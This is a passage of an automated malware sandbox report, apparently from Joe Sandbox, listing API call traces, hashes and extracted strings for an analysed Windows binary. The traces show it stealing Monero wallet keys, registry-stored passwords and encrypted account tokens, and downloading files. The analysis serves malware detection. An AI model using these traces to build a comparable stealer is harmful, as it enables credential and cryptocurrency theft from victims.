                          • StrStrA.SHLWAPI(?,00840768), ref: 00DF43F3
                          • GlobalFree.KERNEL32(?), ref: 00DF4512
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                            • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                            • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF44A3
                          • StrCmpCA.SHLWAPI(?,00E008D1), ref: 00DF44C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DF44D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00DF44E5
                          • lstrcat.KERNEL32(00000000,00E00FB8), ref: 00DF44F4
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: c7906df01814cb8162998f9994078c85a877aa59f8b339b754ab25a6d70ae9a1
                          • Instruction ID: c05393eb04ec44c6fe85ad94185a865410f12148ef4abac83dd32f8cf579e630
                          • Opcode Fuzzy Hash: c7906df01814cb8162998f9994078c85a877aa59f8b339b754ab25a6d70ae9a1
                          • Instruction Fuzzy Hash: D17135B6A00208ABCB24FBA4DC95FEE7379EB48300F148598F60997185DA75DB45CFB1
                          APIs
                            • Part of subcall function 00DE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                            • Part of subcall function 00DE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                            • Part of subcall function 00DE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                            • Part of subcall function 00DE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                            • Part of subcall function 00DE12A0: RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00DE134F
                          • lstrlen.KERNEL32(?), ref: 00DE135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00DE1377
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00DE1465
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00DE14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 15a600316d765a945becb27d55fffaaec593ee6350cd921d2cc2ad479fc40c32
                          • Instruction ID: 75ef64af6fd5467630cf3e2a09335c3f1e2ffa037adf0e230c8cf52a95ed8eb0
                          • Opcode Fuzzy Hash: 15a600316d765a945becb27d55fffaaec593ee6350cd921d2cc2ad479fc40c32
                          • Instruction Fuzzy Hash: FA512FF195021997CB25FB64DD92AED737CEF50300F4181A8B70E66082EE706B89CBB5
                          APIs
                            • Part of subcall function 00DE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                            • Part of subcall function 00DE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                            • Part of subcall function 00DE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                            • Part of subcall function 00DE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                            • Part of subcall function 00DE72D0: HeapFree.KERNEL32(00000000), ref: 00DE7459
                          • lstrcat.KERNEL32(00000000,00E017FC), ref: 00DE7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DE7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00DE765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DE768F
                          • lstrcat.KERNEL32(00000000,00E01804), ref: 00DE76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DE76D3
                          • lstrcat.KERNEL32(00000000,00E01808), ref: 00DE76ED
                          • task.LIBCPMTD ref: 00DE76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                          • Instruction ID: 8832eefe7296b19e313e7f0714ce9a3b71c90e5d6bcb827873d08b392c08a861
                          • Opcode Fuzzy Hash: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                          • Instruction Fuzzy Hash: CA314F75A00249DBCB68FFA5DC59DFE7378EB48301B204118F106A7284DE39A946DB70
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00840330,00000000,?,00E00E2C,00000000,?,00000000), ref: 00DF8130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00DF8158
                          • __aulldiv.LIBCMT ref: 00DF8172
                          • __aulldiv.LIBCMT ref: 00DF8180
                          • wsprintfA.USER32 ref: 00DF81AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                          • Instruction ID: 7f8d9f0be049c980da77cb8076944dffc0a2677623dbcbeacf2dca0f6ce5b7d1
                          • Opcode Fuzzy Hash: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                          • Instruction Fuzzy Hash: B821F9B1E44218ABDB10DFD4CC49FAEB7B9EB44B10F208609F705BB284DB7959058BA5
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                          • InternetOpenA.WININET(00E00DF7,00000001,00000000,00000000,00000000), ref: 00DE610F
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00DE618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00DE61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00DE61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DE620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00DE6249
                          • InternetCloseHandle.WININET(?), ref: 00DE6253
                          • InternetCloseHandle.WININET(00000000), ref: 00DE6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                          • Instruction ID: 4983c4b91fdbd00237fe5f8b9746e192f516ac4d5b51b42653c29ebcafed9f11
                          • Opcode Fuzzy Hash: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                          • Instruction Fuzzy Hash: 89516EB1A00218EBDB20EF51DC45BEE77B8FB44745F108098E709A7184DB75AA85CFB9
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                          • HeapFree.KERNEL32(00000000), ref: 00DE7459
                          • task.LIBCPMTD ref: 00DE7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                          • Instruction ID: 5d61987f21070368134c4e0ccd51b8ec5afc415edf1f60a8b275e2c1826a0e0d
                          • Opcode Fuzzy Hash: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                          • Instruction Fuzzy Hash: 29611AB59042989BDB24EB51DC51BD9B7B8FF44300F0481E9E689A6181EBB05FC9CFB0
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          • lstrlen.KERNEL32(00000000), ref: 00DEBC9F
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00DEBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00DEBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00DEBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                          • Instruction ID: 466480349c74b5feda3ff6c6356eb341d0cae080d06d67f7c5b28c302d22f1b5
                          • Opcode Fuzzy Hash: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                          • Instruction Fuzzy Hash: 93B15FB191011C9BCB14FBA4CC96EFE7338EF54300F558169F60AA6095EF746A49CB72
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                          • Instruction ID: b81483b4ae803f9f8c695413070e5cf4afddae1606be2ced5e71c07000805122
                          • Opcode Fuzzy Hash: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                          • Instruction Fuzzy Hash: DFF05430A04209EFD364AFE0E90972CBB70FB14707F244198E646C7F84DA7A4B41DBA9
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DE4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE4FD1
                          • InternetOpenA.WININET(00E00DDF,00000000,00000000,00000000,00000000), ref: 00DE4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DE5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00DE5041
                          • InternetCloseHandle.WININET(?), ref: 00DE50B9
                          • InternetCloseHandle.WININET(?), ref: 00DE50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 6186cb7dbcabc4e6126f4cfb9239a78eaf9cd58d6a811a54fca076c48b0ef2fc
                          • Instruction ID: e4d3d8b108aba24b2291ad4d241afde3039a6dda500ffaec568b511796da6345
                          • Opcode Fuzzy Hash: 6186cb7dbcabc4e6126f4cfb9239a78eaf9cd58d6a811a54fca076c48b0ef2fc
                          • Instruction Fuzzy Hash: 3431F7B4A00218EBDB20DF54DC85BD8B7B4FB48704F5081D9F609A7285CB756A858FA8
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                          • wsprintfA.USER32 ref: 00DF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00840570,00000000,000F003F,?,00000400), ref: 00DF84EC
                          • lstrlen.KERNEL32(?), ref: 00DF8501
                          • RegQueryValueExA.ADVAPI32(00000000,008404F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E00B34), ref: 00DF8599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF8608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
